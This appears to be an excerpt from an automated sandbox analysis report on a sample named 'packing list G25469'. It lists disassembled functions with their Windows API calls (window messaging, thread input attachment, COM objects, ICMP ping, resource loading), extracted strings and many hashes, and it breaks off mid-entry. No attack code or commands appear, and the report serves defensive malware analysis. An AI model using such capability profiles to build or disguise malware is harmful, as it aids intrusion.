                                                  • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                  • Instruction Fuzzy Hash: ED71D771A00F16ABE7249E78CC61B5AB7E8EF00766F1842E9FD10D66C1E774D9448BD0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B74DF8
                                                  • GetMenuItemInfoW.USER32(00BF1708,000000FF,00000000,00000030), ref: 00B74E59
                                                  • SetMenuItemInfoW.USER32(00BF1708,00000004,00000000,00000030), ref: 00B74E8F
                                                  • Sleep.KERNEL32(000001F4), ref: 00B74EA1
                                                  • GetMenuItemCount.USER32(?), ref: 00B74EE5
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00B74F01
                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00B74F2B
                                                  • GetMenuItemID.USER32(?,?), ref: 00B74F70
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B74FB6
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B74FCA
                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B74FEB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                  • String ID:
                                                  • API String ID: 4176008265-0
                                                  • Opcode ID: 74ee5b7add6d8d514eb8c8c1e930446193587a1aa35f5ee2e10ec82e5b59c945
                                                  • Instruction ID: 9a7b9336671214343a1bf5df0dd1a06e5ae385189baae2777c09d7bbe009313c
                                                  • Opcode Fuzzy Hash: 74ee5b7add6d8d514eb8c8c1e930446193587a1aa35f5ee2e10ec82e5b59c945
                                                  • Instruction Fuzzy Hash: 3C61B371900249AFDB21CF68DC84ABE7BF8FB05305F148599F429AB251D771AD05CB20
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B99C98
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B99C9B
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B99CBF
                                                  • _memset.LIBCMT ref: 00B99CD0
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B99CE2
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B99D5A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow_memset
                                                  • String ID:
                                                  • API String ID: 830647256-0
                                                  • Opcode ID: 38e64fe46e277a1e6116947402eaf1fa154fa3f0e76bde9b8865050638f28705
                                                  • Instruction ID: a3590b01eb3659bbf7aa33619d508788a886f7e09fb78178ec758659f521d519
                                                  • Opcode Fuzzy Hash: 38e64fe46e277a1e6116947402eaf1fa154fa3f0e76bde9b8865050638f28705
                                                  • Instruction Fuzzy Hash: B6616975900208AFDB10DFA8CC81EEEB7F8EF09714F1445AAFA05E72A1D774A945DB60
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00B694FE
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00B69549
                                                  • VariantInit.OLEAUT32(?), ref: 00B6955B
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B6957B
                                                  • VariantCopy.OLEAUT32(?,?), ref: 00B695BE
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B695D2
                                                  • VariantClear.OLEAUT32(?), ref: 00B695E7
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00B695F4
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B695FD
                                                  • VariantClear.OLEAUT32(?), ref: 00B6960F
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B6961A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: 896709a6a6ee40f11f2df98098d55e2a7e6b9361f9e05998ce203a081ab7290f
                                                  • Instruction ID: 817326f7e55d69c18e6ed38351e8d571a9e22b4dbb093d49d811adcda465dbbb
                                                  • Opcode Fuzzy Hash: 896709a6a6ee40f11f2df98098d55e2a7e6b9361f9e05998ce203a081ab7290f
                                                  • Instruction Fuzzy Hash: DC413D35900219AFCB01EFA4D8849DEBFB9FF08354F0080A5E512A3251EF79EA45DBA1
                                                  APIs
                                                    • Part of subcall function 00B3936C: __swprintf.LIBCMT ref: 00B393AB
                                                    • Part of subcall function 00B3936C: __itow.LIBCMT ref: 00B393DF
                                                  • CoInitialize.OLE32 ref: 00B8ADF6
                                                  • CoUninitialize.OLE32 ref: 00B8AE01
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00BBD8FC,?), ref: 00B8AE61
                                                  • IIDFromString.OLE32(?,?), ref: 00B8AED4
                                                  • VariantInit.OLEAUT32(?), ref: 00B8AF6E
                                                  • VariantClear.OLEAUT32(?), ref: 00B8AFCF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 834269672-1287834457
                                                  • Opcode ID: 4d99ba3da774f08a62d14818ea173f03a092571893edd705d76fa12f8a05a3f1
                                                  • Instruction ID: 2fb4812affc23443cb343bd7e6be969ee44370210911fa6bf98801f78057977e
                                                  • Opcode Fuzzy Hash: 4d99ba3da774f08a62d14818ea173f03a092571893edd705d76fa12f8a05a3f1
                                                  • Instruction Fuzzy Hash: 4C619C70208301AFE710EF54D888B6AB7E8EF48715F10499AFA85DB2A1D774ED44CB93
                                                  APIs
                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00B88168
                                                  • inet_addr.WSOCK32(?,?,?), ref: 00B881AD
                                                  • gethostbyname.WSOCK32(?), ref: 00B881B9
                                                  • IcmpCreateFile.IPHLPAPI ref: 00B881C7
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B88237
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B8824D
                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B882C2
                                                  • WSACleanup.WSOCK32 ref: 00B882C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: 91b4527f3ba381b4c1ab2201427c000c7307d04c98e72ee95399f9d4a49b4e30
                                                  • Instruction ID: a00ed8e91ee29fe9c87d9292652101bd83049ef17350064c0905a2cccdda3417
                                                  • Opcode Fuzzy Hash: 91b4527f3ba381b4c1ab2201427c000c7307d04c98e72ee95399f9d4a49b4e30
                                                  • Instruction Fuzzy Hash: 1251BF316007009FD710AF24CC89B2ABBE4EF48320F5489A9F955EB2A1DF74ED00CB42
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B7E396
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B7E40C
                                                  • GetLastError.KERNEL32 ref: 00B7E416
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00B7E483
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: 43270daa23232fb15a6b8587dbc3162eee863eee8598e3f576574f7acd166b3a
                                                  • Instruction ID: 017262a453ec38fcda27d7dc4bd8e4b138403a19b4e628508e6091d73a71993f
                                                  • Opcode Fuzzy Hash: 43270daa23232fb15a6b8587dbc3162eee863eee8598e3f576574f7acd166b3a
                                                  • Instruction Fuzzy Hash: CA317435A002099FDB01DFA4C889AADBBF8EF49704F24C0E5E52AE7391DB74DA41C751
                                                  APIs
                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B6B98C
                                                  • GetDlgCtrlID.USER32 ref: 00B6B997
                                                  • GetParent.USER32 ref: 00B6B9B3
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B6B9B6
                                                  • GetDlgCtrlID.USER32(?), ref: 00B6B9BF
                                                  • GetParent.USER32(?), ref: 00B6B9DB
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B6B9DE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1383977212-1403004172
                                                  • Opcode ID: 8fb07599bb3b5d5c891a7037667b84c9efc613d362976d6776d2253561bfed5f
                                                  • Instruction ID: c29f639a692f918e3907f465d12dfcca03b38376968903a07931c053a39d607f
                                                  • Opcode Fuzzy Hash: 8fb07599bb3b5d5c891a7037667b84c9efc613d362976d6776d2253561bfed5f
                                                  • Instruction Fuzzy Hash: 5E21B674A00108BFDB04ABA4CC95EFEBBF5EF45300F100255F552A32E1EBB85855DB20
                                                  APIs
                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B6BA73
                                                  • GetDlgCtrlID.USER32 ref: 00B6BA7E
                                                  • GetParent.USER32 ref: 00B6BA9A
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B6BA9D
                                                  • GetDlgCtrlID.USER32(?), ref: 00B6BAA6
                                                  • GetParent.USER32(?), ref: 00B6BAC2
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B6BAC5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1383977212-1403004172
                                                  • Opcode ID: 4bb2d5dbea51eba507b02fe0afe673ccb7d1de5cc1c633ad6bcaf4d4c0d82380
                                                  • Instruction ID: ae16477983c3766a422d6dad163ea9c18ace78dfa58d4a9e71bac23701ab8ab0
                                                  • Opcode Fuzzy Hash: 4bb2d5dbea51eba507b02fe0afe673ccb7d1de5cc1c633ad6bcaf4d4c0d82380
                                                  • Instruction Fuzzy Hash: 0D21C574A00108BFDB00ABA4CC85EFEBBF9EF45300F100159F552A31A1EFB999559F20
                                                  APIs
                                                  • GetParent.USER32 ref: 00B6BAE3
                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00B6BAF8
                                                  • _wcscmp.LIBCMT ref: 00B6BB0A
                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B6BB85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                  • API String ID: 1704125052-3381328864
                                                  • Opcode ID: 88cec2b456c36131ab9e3de9caf3aa5fca859a38d61402d31849711cd710f708
                                                  • Instruction ID: 175bfd24d3b9dc1451fb577be068e874b8e30c29e1f25ee31c7f51d4fb0d401c
                                                  • Opcode Fuzzy Hash: 88cec2b456c36131ab9e3de9caf3aa5fca859a38d61402d31849711cd710f708
                                                  • Instruction Fuzzy Hash: 53110676648343FAFA247725EC07EA637EDDB11324B2000F6FE05E50E9FFA9A8915514
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00B8B2D5
                                                  • CoInitialize.OLE32(00000000), ref: 00B8B302
                                                  • CoUninitialize.OLE32 ref: 00B8B30C
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00B8B40C
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B8B539
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00B8B56D
                                                  • CoGetObject.OLE32(?,00000000,00BBD91C,?), ref: 00B8B590
                                                  • SetErrorMode.KERNEL32(00000000), ref: 00B8B5A3
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B8B623
                                                  • VariantClear.OLEAUT32(00BBD91C), ref: 00B8B633
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                  • String ID:
                                                  • API String ID: 2395222682-0
                                                  • Opcode ID: b4226d6f4a6a5fe569f432d32bfdf4bd221cb112178b84276cddf99fe603a111
                                                  • Instruction ID: 217860ea86d036117ccf7b42e9f5eecaf434afcfea0db250c3a7347516534f58
                                                  • Opcode Fuzzy Hash: b4226d6f4a6a5fe569f432d32bfdf4bd221cb112178b84276cddf99fe603a111
                                                  • Instruction Fuzzy Hash: 6EC1F0B1608305AFC700EF68C895D6AB7E9FF88304F1449ADF58A9B261DB71ED05CB52
                                                  APIs
                                                  • __lock.LIBCMT ref: 00B5ACC1
                                                    • Part of subcall function 00B57CF4: __mtinitlocknum.LIBCMT ref: 00B57D06
                                                    • Part of subcall function 00B57CF4: EnterCriticalSection.KERNEL32(00000000,?,00B57ADD,0000000D), ref: 00B57D1F
                                                  • __calloc_crt.LIBCMT ref: 00B5ACD2
                                                    • Part of subcall function 00B56986: __calloc_impl.LIBCMT ref: 00B56995
                                                    • Part of subcall function 00B56986: Sleep.KERNEL32(00000000,000003BC,00B4F507,?,0000000E), ref: 00B569AC
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B5ACED
                                                  • GetStartupInfoW.KERNEL32(?,00BE6E28,00000064,00B55E91,00BE6C70,00000014), ref: 00B5AD46
                                                  • __calloc_crt.LIBCMT ref: 00B5AD91
                                                  • GetFileType.KERNEL32(00000001), ref: 00B5ADD8
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00B5AE11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 1426640281-0
                                                  • Opcode ID: 8a64ba490dda6b72012f19fbacb0a68f14d516f9ab9e5b544a28c7623353de5a
                                                  • Instruction ID: 900b9dc5ff257a136a753fbde5ec601013177754bf33082211530927631e3560
                                                  • Opcode Fuzzy Hash: 8a64ba490dda6b72012f19fbacb0a68f14d516f9ab9e5b544a28c7623353de5a
                                                  • Instruction Fuzzy Hash: C48190719053458FDB14DF68C8816A9BBF0EF09326B2483EDD8A6BB3D1D7349806CB56
                                                  APIs
                                                  • __swprintf.LIBCMT ref: 00B767FD
                                                  • __swprintf.LIBCMT ref: 00B7680A
                                                    • Part of subcall function 00B5172B: __woutput_l.LIBCMT ref: 00B51784
                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00B76834
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00B76840
                                                  • LockResource.KERNEL32(00000000), ref: 00B7684D
                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00B7686D
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00B7687F
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00B7688E
                                                  • LockResource.KERNEL32(?), ref: 00B7689A
                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B768F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                  • String ID:
                                                  • API String ID: 1433390588-0
                                                  • Opcode ID: c56de7c5821daf99463e1680ad3936ced3fd48a1a39145c40c54254921f6f45f
                                                  • Instruction ID: 6150f7ff533cab713fe08b138c9e0989abcb33493ae3b793c97c857c83f27dec
                                                  • Opcode Fuzzy Hash: c56de7c5821daf99463e1680ad3936ced3fd48a1a39145c40c54254921f6f45f
                                                  • Instruction Fuzzy Hash: C731AEB190065AAFDB109F61DD85EBA7BE8EF08341F008966F926E3140EB74DA11DB71
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00B74047
                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B730A5,?,00000001), ref: 00B7405B
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00B74062
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B730A5,?,00000001), ref: 00B74071
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B74083
                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B730A5,?,00000001), ref: 00B7409C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B730A5,?,00000001), ref: 00B740AE
                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B730A5,?,00000001), ref: 00B740F3
                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B730A5,?,00000001), ref: 00B74108
                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B730A5,?,00000001), ref: 00B74113
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: 30dbe4d5abecf97d60dd6c773eeef4e5c9e7600d950f09155f7fdbc7ff4786da
                                                  • Instruction ID: 6dc1e2c4284753e0a0ad57e728ca185233058a613e0cb348ff08a4ed14013691
                                                  • Opcode Fuzzy Hash: 30dbe4d5abecf97d60dd6c773eeef4e5c9e7600d950f09155f7fdbc7ff4786da
                                                  • Instruction Fuzzy Hash: B631BF75500204AFDB10EF68DC8AB797BE9EB51712F11C145FA19E7290EFB99980CF60
                                                  APIs
                                                  • EnumChildWindows.USER32(?,00B6CF50), ref: 00B6CE90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumWindows
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                  • API String ID: 3555792229-1603158881
                                                  • Opcode ID: 307af6357ca606a16d0d8e28098fdce65adaceeb2dbbb06b276b14623bb8a1c9
                                                  • Instruction ID: b954ac8283dc370100ac8b686ff66bbb1b70d1533888817fe4688e50670d4c4f
